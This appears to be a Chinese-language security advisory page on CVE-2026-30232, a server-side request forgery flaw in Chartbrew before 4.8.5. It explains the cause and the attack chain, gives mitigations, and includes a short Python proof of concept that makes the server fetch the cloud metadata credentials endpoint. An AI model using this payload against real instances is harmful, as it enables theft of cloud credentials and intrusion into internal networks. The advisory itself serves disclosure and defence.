IPBUF安全漏洞报告
English
CVE-2026-30232 CVSS 9.6 严重

CVE-2026-30232 Chartbrew SSRF漏洞

披露日期: 2026-04-10

漏洞信息

漏洞编号
CVE-2026-30232
漏洞类型
服务端请求伪造 (SSRF)
CVSS评分
9.6 严重
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Chartbrew

相关标签

SSRFChartbrewServer-Side Request Forgery云元数据窃取

漏洞概述

Chartbrew是一个开源的Web应用程序,用于连接数据库和API以创建图表。在4.8.5版本之前,该软件存在一个安全漏洞。经过身份验证的用户可以创建具有任意URL的API数据连接。由于服务器端使用request-promise库获取这些URL时未进行任何IP地址验证,攻击者可以利用此漏洞发起服务器端请求伪造(SSRF)攻击。这使得攻击者能够访问内部网络资源或云元数据端点。该问题已在4.8.5版本中得到修复。

技术细节

该漏洞的根本原因在于Chartbrew处理API数据连接时的输入验证不足。在受影响的版本中,系统允许经过身份验证的用户(即使是低权限用户)指定任意URL作为数据源。当服务器处理这些请求时,使用了`request-promise`库向后端指定的URL发起HTTP请求。关键在于,代码逻辑中缺乏对目标URL的IP地址或域名的白名单校验机制。这意味着攻击者可以构造恶意的请求,指向内网敏感服务(如127.0.0.1、内网数据库端口)或云服务商的元数据服务(如AWS的169.254.169.254)。由于请求是从服务器端发出的,防火墙通常不会拦截此类流量,从而导致SSRF攻击。攻击者利用这一点可以扫描内网端口、读取敏感文件或获取云服务器的临时凭证。

攻击链分析

STEP 1
1. 身份认证
攻击者需要获取一个低权限的已认证用户账户,能够登录Chartbrew平台。
STEP 2
2. 构造恶意请求
攻击者在创建API数据连接功能处,输入恶意的内部URL(如云元数据服务地址)作为数据源。
STEP 3
3. 服务端请求
服务器端接收请求后,使用request-promise库向攻击者指定的内部地址发起HTTP请求。
STEP 4
4. 获取敏感信息
由于缺乏IP校验,服务器返回了内网资源或云凭证信息给攻击者,完成SSRF攻击。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Exploit code example for CVE-2026-30232 # Target: Chartbrew instance # Description: Send a request to the API data connection endpoint with an internal URL. target_url = "http://vulnerable-chartbrew-instance.com/api/connections" malicious_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" payload = { "name": "Malicious Internal Scan", "type": "api", "options": { "url": malicious_url, "method": "GET" } } headers = { "Content-Type": "application/json", "Authorization": "Bearer <VALID_USER_TOKEN>" } response = requests.post(target_url, json=payload, headers=headers) if response.status_code == 200: print("[+] Connection created successfully. Server fetched internal metadata.") else: print("[-] Failed to create connection.")

影响范围

Chartbrew < 4.8.5

防御指南

临时缓解措施
如果无法立即升级,建议限制普通用户创建API数据连接的权限,并在服务器防火墙层面阻断对169.254.169.254(云元数据)及内网敏感网段的访问。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表